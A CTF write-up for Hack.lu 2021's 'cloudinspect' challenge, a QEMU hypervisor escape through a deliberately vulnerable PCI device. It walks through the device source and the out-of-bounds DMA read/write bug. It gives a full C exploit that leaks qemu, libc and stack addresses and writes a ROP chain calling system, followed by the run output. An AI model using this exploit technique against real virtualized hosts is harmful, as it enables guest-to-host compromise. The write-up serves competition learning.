cloudinspect - Hack.lu CTF 2021

This was my first time ever writing an exploit for a hypervisor escape, and the challenge got only 14 solves during the CTF (one of which was ours).

Note: Not everything in this writeup may be technically correct, let me know if I messed up anywhere :)

tl;dr

  • Vulnerable PCI device in qemu
  • Relative OOB r/w

Analysis

The qemu patch adds an intentionally vulnerable PCI device called cloudinspect. This device supports DMA and mmio (memory-mapped i/o). Let's have a look at a few relevant functions.

The following structure stores the state of the device:

// Per-instance state of the cloudinspect PCI device.
struct CloudInspectState {
    PCIDevice pdev;
    MemoryRegion mmio;
    AddressSpace *as;    // address space passed to dma_memory_read/dma_memory_write

    // DMA registers; each one is read and written through the mmio handlers
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    char dma_buf[0x1000];    // device-side buffer that DMA transfers copy into / out of
};

We can see that the device has 4 registers - src, dst, cnt and cmd. It also has a buffer dma_buf to which we can read and write data from the guest (more on how this works later).

Using the following mmio handlers, we can trigger certain handler functions by simply accessing specific physical memory addresses.

// MMIO read handler: returns the value of the register selected by addr.
// Offset 0x00 yields a fixed constant, the CMD/SRC/DST/CNT offsets return the
// matching dma register, and any other offset reads as all-ones.
static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    CloudInspectState *cloudinspect = opaque;
    uint64_t val = ~0ULL;    // default for offsets not handled below

    switch (addr) {
    case 0x00:
        val = 0xc10dc10dc10dc10d;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        val = cloudinspect->dma.cmd;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        val = cloudinspect->dma.src;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        val = cloudinspect->dma.dst;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        val = cloudinspect->dma.cnt;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        // Reading the trigger register runs the DMA operation with write == false;
        // the value read back is the operation's success flag.
        val = cloudinspect_DMA_op(cloudinspect, false);
        break;
    }

    return val;
}

// MMIO write handler: stores val into the dma register selected by addr.
// Writes to offsets not listed below are ignored.
static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val,
                unsigned size)
{
    CloudInspectState *cloudinspect = opaque;

    switch (addr) {
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        cloudinspect->dma.cmd = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        cloudinspect->dma.src = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        cloudinspect->dma.dst = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        cloudinspect->dma.cnt = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        // Writing the trigger register runs the DMA operation with write == true.
        // The written value is not consulted, and the result stored in val is unused.
        val = cloudinspect_DMA_op(cloudinspect, true);
        break;
    }
}

When we access the physical memory allocated for the PCI device at specific offsets, certain functions are triggered (this will trigger mmio_write functions if we write to the memory, and mmio_read functions if we read from it). The exact offsets that we need to access to trigger said functions are defined here:

// Byte offsets of the device registers inside the mmio region
#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78
#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80
#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88
#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90
#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98

These mmio handlers can be used to set and retrieve registers, and also to trigger the cloudinspect_DMA_op function.

// Validate the programmed DMA command and run the transfer.
// Returns true when a transfer was started, false when the command is unknown
// or dma.cnt exceeds DMA_SIZE.
static bool cloudinspect_DMA_op(CloudInspectState *cloudinspect, bool write) {
    switch (cloudinspect->dma.cmd) {
        // Both commands share one path; the direction comes from `write`
        case CLOUDINSPECT_DMA_GET_VALUE:
        case CLOUDINSPECT_DMA_PUT_VALUE:
            // Only the length is bounded here; dma.src and dma.dst are not checked
            if (cloudinspect->dma.cnt > DMA_SIZE) {
                return false;
            }
            cloudinspect_dma_rw(cloudinspect, write);
            break;
        default:
            return false;
    }

    return true;
}

// Perform the DMA transfer between the address space `as` and dma_buf.
// write == true : copy dma.cnt bytes from address dma.src into dma_buf + dma.dst
// write == false: copy dma.cnt bytes from dma_buf + dma.src to address dma.dst
// The offset added to dma_buf is used as-is, without any bounds check in this function.
static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)
{
    if (write) {
        uint64_t dst = cloudinspect->dma.dst;
        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
        dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt);
    } else {
        uint64_t src = cloudinspect->dma.src;
        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
        dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt);
    }
}

As you can see here, if we access the trigger offset, it triggers r/w to the dma_buf, from the guest. Read/write is handled using the src, dst and cnt registers, so setting these would be sufficient to perform controlled read/write.

  • dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt); -> Here dma.src should contain a guest physical address that we control, and dma.cnt bytes are read from that address into dma_buf + dst.
  • dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt); -> Here dma.dst should contain a guest physical address that we control, and dma.cnt bytes are written from dma_buf + src to that address.

The only check here is if (cloudinspect->dma.cnt > DMA_SIZE), meaning that the dst and src registers are unchecked, allowing for oob r/w relative to dma_buf.

Exploitation

Now we need to interact with the device, so we need to find the physical memory allocated for the device in order to trigger the mmio handler functions.

For this, we can simply boot up the qemu vm, and use the command lspci, and identify the PCI device:

// Class initializer: installs the realize/exit callbacks and the PCI
// identification values for the cloudinspect device class.
static void cloudinspect_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_cloudinspect_realize;
    k->exit = pci_cloudinspect_uninit;
    // Vendor/device ID pair used to recognise the device from inside the guest
    k->vendor_id = 0x1337;
    k->device_id = 0x1337;
    k->revision = 0xc1;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

We can use the vendor ID and device ID defined here to identify the device. Once we have identified it, viewing /proc/iomem gives us the physical address where the device is mapped; in our case the address was 0xfeb00000 and the size was 0x100000.

Now we can simply open and mmap /dev/mem at the offset and with the size that we got, and we have access to the physical memory to be able to access the mmio functions (thanks to this blogpost for the explanation).

/*
 * Map the device's mmio region into this process through /dev/mem.
 *
 * offset: physical base address of the region; mmio_size bytes are mapped.
 *
 * Returns the mapping, or MAP_FAILED (after printing the reason) when
 * /dev/mem cannot be opened or mapped.
 */
void* devmap(size_t offset)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("open /dev/mem");
        return MAP_FAILED;
    }

    // Map at the address the caller asked for instead of ignoring the argument
    void* result = mmap(NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, (off_t)offset);
    if (result == MAP_FAILED) {
        perror("mmap /dev/mem");
    }

    // The mapping stays valid after the descriptor is closed
    close(fd);
    return result;
}

To use DMA memory read and write functions, we need the physical address of a buffer we have control over, so for this we can just mmap a buffer, and get its physical address from its virtual address using this function (again thanks to this blogpost).

/*
 * Translate a virtual address of this process into a physical address by
 * looking up its entry in /proc/self/pagemap.
 *
 * addr: virtual address inside a page that has already been touched.
 *
 * Returns the physical address, or 0 (after printing the reason) when the
 * entry cannot be read, the page is not present, or the kernel hides the
 * page frame number (it reads as 0 without sufficient privileges).
 */
size_t virt_to_phys(void* addr)
{
    const uint64_t pfn_mask = 0x7FFFFFFFFFFFFFULL;    // bits 0-54: page frame number
    const uint64_t present = 1ULL << 63;              // bit 63: page present in RAM

    long page_size = sysconf(_SC_PAGESIZE);
    if (page_size <= 0) {
        perror("sysconf(_SC_PAGESIZE)");
        return 0;
    }

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open /proc/self/pagemap");
        return 0;
    }

    // pagemap holds one 64-bit entry per virtual page, indexed by page number
    uint64_t entry = 0;
    off_t offset = (off_t)((uintptr_t)addr / (uintptr_t)page_size * sizeof entry);
    int ok = lseek(fd, offset, SEEK_SET) == offset
          && read(fd, &entry, sizeof entry) == (ssize_t)sizeof entry;
    if (!ok) {
        perror("read /proc/self/pagemap");
    }
    close(fd);
    if (!ok) {
        return 0;
    }

    uint64_t pfn = entry & pfn_mask;
    if (!(entry & present) || pfn == 0) {
        fprintf(stderr, "virt_to_phys: no page frame number for %p\n", addr);
        return 0;
    }

    // Frame base plus the offset of addr inside its page
    return (size_t)(pfn * (uint64_t)page_size + (uintptr_t)addr % (uintptr_t)page_size);
}

Now, simply accessing the device’s physical memory address at the offsets defined for each functionality will allow us to both set registers, and trigger r/w between our mmapped buffer and the dma_buf.

From here onwards the exploit is fairly straightforward, we can read out-of-bounds relative to the dma_buf, so debugging and dumping memory allowed us to leak the base address of the qemu ELF, the address of dma_buf, and the libc base address.

After this, we looked for multiple targets to overwrite and get a shell, but on leaking the address of libc, we found that the VM was probably running on Ubuntu 20.04.

Being in a typical CTF rush, we just popped up a 20.04 instance, and went for a cheesy and CTF-style route of exploitation -

  • Used the libc address to compute the offset from dma_buf to libc's environ, leaked a stack address from environ, and from it computed the offset to a qemu return address.
  • Overwrote the return address with a small ropchain to set rdi to dma_buf, and return to system with a controlled argument.

We were only able to see stderr, so calling system("cat flag >&2") gave us the flag!

Exploit script

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdbool.h>

// Number of bytes read from /proc/self/pagemap per lookup
#define PAGEMAP_LENGTH sizeof(size_t)
// Physical base address and size of the device's mmio region
// (the values found in /proc/iomem in our case)
unsigned int mmio_addr = 0xfeb00000;
unsigned int mmio_size = 0x100000;
// Mapping of the mmio region; assigned in main() from devmap()
char* mmio = 0;

// Register offsets inside the mmio region; same values as the device source shown above
#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78
#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80
#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88
#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90
#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98

typedef uint64_t u64;

/*
 * Map the device's mmio region into this process through /dev/mem.
 *
 * offset: physical base address of the region; mmio_size bytes are mapped.
 *
 * Returns the mapping, or MAP_FAILED (after printing the reason) when
 * /dev/mem cannot be opened or mapped.
 */
void* devmap(size_t offset)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd < 0) {
        perror("open /dev/mem");
        return MAP_FAILED;
    }

    // Map at the address the caller asked for instead of ignoring the argument
    void* result = mmap(NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, (off_t)offset);
    if (result == MAP_FAILED) {
        perror("mmap /dev/mem");
    }

    // The mapping stays valid after the descriptor is closed
    close(fd);

    return result;
}

/*
 * Translate a virtual address of this process into a physical address by
 * looking up its entry in /proc/self/pagemap.
 *
 * addr: virtual address inside a page that has already been touched.
 *
 * Returns the physical address, or 0 (after printing the reason) when the
 * entry cannot be read, the page is not present, or the kernel hides the
 * page frame number (it reads as 0 without sufficient privileges).
 */
size_t virt_to_phys(void* addr)
{
    const uint64_t pfn_mask = 0x7FFFFFFFFFFFFFULL;    // bits 0-54: page frame number
    const uint64_t present = 1ULL << 63;              // bit 63: page present in RAM

    long page_size = sysconf(_SC_PAGESIZE);
    if (page_size <= 0) {
        perror("sysconf(_SC_PAGESIZE)");
        return 0;
    }

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open /proc/self/pagemap");
        return 0;
    }

    // pagemap holds one 64-bit entry per virtual page, indexed by page number
    uint64_t entry = 0;
    off_t offset = (off_t)((uintptr_t)addr / (uintptr_t)page_size * sizeof entry);
    int ok = lseek(fd, offset, SEEK_SET) == offset
          && read(fd, &entry, sizeof entry) == (ssize_t)sizeof entry;
    if (!ok) {
        perror("read /proc/self/pagemap");
    }
    close(fd);
    if (!ok) {
        return 0;
    }

    uint64_t pfn = entry & pfn_mask;
    if (!(entry & present) || pfn == 0) {
        fprintf(stderr, "virt_to_phys: no page frame number for %p\n", addr);
        return 0;
    }

    // Frame base plus the offset of addr inside its page
    return (size_t)(pfn * (uint64_t)page_size + (uintptr_t)addr % (uintptr_t)page_size);
}

// Program the device's cmd register.
// The store goes through a volatile lvalue so the compiler has to emit it,
// in program order relative to the other volatile register accesses.
void set_cmd(u64 val)
{
    *(volatile u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_CMD] = val;
}

// Program the device's src register.
// The store goes through a volatile lvalue so the compiler has to emit it,
// in program order relative to the other volatile register accesses.
void set_src(u64 val)
{
    *(volatile u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_SRC] = val;
}

// Program the device's dst register.
// The store goes through a volatile lvalue so the compiler has to emit it,
// in program order relative to the other volatile register accesses.
void set_dst(u64 val)
{
    *(volatile u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_DST] = val;
}

// Program the device's cnt register (number of bytes to transfer).
// The store goes through a volatile lvalue so the compiler has to emit it,
// in program order relative to the other volatile register accesses.
void set_cnt(u64 val)
{
    *(volatile u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_CNT] = val;
}

void trigger_write(void)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_TRIGGER] = 1;
}

u64 trigger_read()
{
    return *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_TRIGGER];
}

// Copy `size` bytes from guest physical address `src` into the device's
// dma_buf at byte offset `dst`.
// The device does not validate `dst`, so it may point outside dma_buf.
void do_write(u64 src, u64 dst, u64 size) 
{
    // presumably 1 is one of the CLOUDINSPECT_DMA_*_VALUE commands; their values are not shown here
    set_cmd(1);
    set_src(src);
    set_dst(dst);
    set_cnt(size);
    // Must come last: the trigger access starts the transfer with the registers set above
    trigger_write();
}

// Copy `size` bytes from the device's dma_buf at byte offset `src` to guest
// physical address `dst`.
// The device does not validate `src`, so it may point outside dma_buf.
void do_read(u64 src, u64 dst, u64 size) 
{
    // presumably 1 is one of the CLOUDINSPECT_DMA_*_VALUE commands; their values are not shown here
    set_cmd(1);
    set_src(src);
    set_dst(dst);
    set_cnt(size);
    // Must come last: the trigger access starts the transfer; its result is discarded
    trigger_read();
}

/*
 * Exploit entry point.
 *
 * 1. Map the device registers and allocate a scratch page whose physical
 *    address is known, so the device can DMA to and from it.
 * 2. Use out-of-bounds reads relative to dma_buf to leak the qemu base, the
 *    address of dma_buf, the libc base and a stack address.
 * 3. Place a shell command at the start of dma_buf and overwrite a return
 *    address on the stack with a small ROP chain calling system(dma_buf).
 *
 * Returns 0 once both writes were issued, 1 when the setup fails.
 */
int main(void)
{
    // Map the device's mmio region so the register helpers can reach it
    mmio = devmap(mmio_addr);
    if (mmio == MAP_FAILED) {
        fprintf(stderr, "failed to map the device's mmio region\n");
        return 1;
    }

    // Allocate a buffer to use for physical memory access as tmp space.
    // Anonymous mappings pass fd -1: some implementations require it.
    size_t* tmp_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (tmp_buf == MAP_FAILED) {
        perror("mmap tmp_buf");
        return 1;
    }

    // Touch the page so it is backed by physical memory before looking it up
    memset(tmp_buf, 0xcc, 0x1000);
    printf("virtual address: %p\n", (void*)tmp_buf);

    // Get the physical address from /proc/self/pagemap.
    // tmp_buf is page-aligned, so a result of 0 means the lookup yielded no frame.
    size_t physical_mem = virt_to_phys(tmp_buf);
    if (physical_mem == 0) {
        fprintf(stderr, "could not resolve the physical address of tmp_buf\n");
        return 1;
    }
    printf("physical address: %p\n", (void*)physical_mem);

    // Test if write is working (for debug)
    tmp_buf[0] = 0xdeadbeefcafebabe;
    do_write(physical_mem, 0, 0x8);

    u64 offset;

    // The offsets below were found by dumping memory past dma_buf on the
    // target; they are specific to that qemu build and libc.

    // Leak qemu base
    offset = 0x1030;
    do_read(offset, physical_mem, 0x8);
    u64 qemu_base = tmp_buf[0] - 0x37f510;
    printf("qemu base: 0x%lx\n", qemu_base);

    // Leak dma_buf
    offset = 0x1310;
    do_read(offset, physical_mem, 0x8);
    u64 dma_buf = tmp_buf[0] - 0x1388;
    printf("dma_buf: 0x%lx\n", dma_buf);

    // Leak libc
    offset = 0x2270;
    do_read(offset, physical_mem, 0x8);
    u64 libc_base = tmp_buf[0] - 0x1ebbe0;
    printf("libc base: 0x%lx\n", libc_base);

    u64 libc_system = libc_base + 0x55410;
    u64 pop_rdi = libc_base + 0x26b72;
    u64 ret = libc_base + 0x25679;

    // Leak stack: read libc's environ, addressed relative to dma_buf
    offset = libc_base + 0x1ef2e0 - dma_buf;
    do_read(offset, physical_mem, 0x8);
    u64 stack = tmp_buf[0] - 0x1c0;
    printf("stack: 0x%lx\n", stack);

    // Overwrite start of dma_buf with the NUL-terminated string "cat flag>&2"
    // (little-endian bytes of the two words below)
    tmp_buf[0] = 0x67616c6620746163;
    tmp_buf[1] = 0x32263e;
    do_write(physical_mem, 0, 0x10);
    printf("Write 1 complete!\n");

    // ret to system(dma_buf): pop rdi; dma_buf; ret; system
    // (the extra ret is presumably there to keep the stack 16-byte aligned)
    tmp_buf[0] = pop_rdi;
    tmp_buf[1] = dma_buf;
    tmp_buf[2] = ret;
    tmp_buf[3] = libc_system;

    // Offset from dma_buf to the saved return address on the stack
    offset = stack - dma_buf;
    do_write(physical_mem, offset, 0x20);
    printf("Write 2 complete!\n");

    return 0;

}

Flag

SeaBIOS (version 1.13.0-1ubuntu1.1)
Booting from ROM.
virtual address: 0x7f19a7b8d000
physical address: 0x641c000
qemu base: 0x55f3033bd000
dma_buf: 0x55f30662ed88
libc base: 0x7f7cb5229000
stack: 0x7ffd17324288
Write 1 complete!
Write 2 complete!
The system is going down NOW!
Sent SIGTERM to all processes
Sent SIGKILL to all processes
Requesting system poweroff
flag{cloudinspect_inspects_your_cloud_0107}

Overall, a really fun challenge, and my first ever hypervisor escape!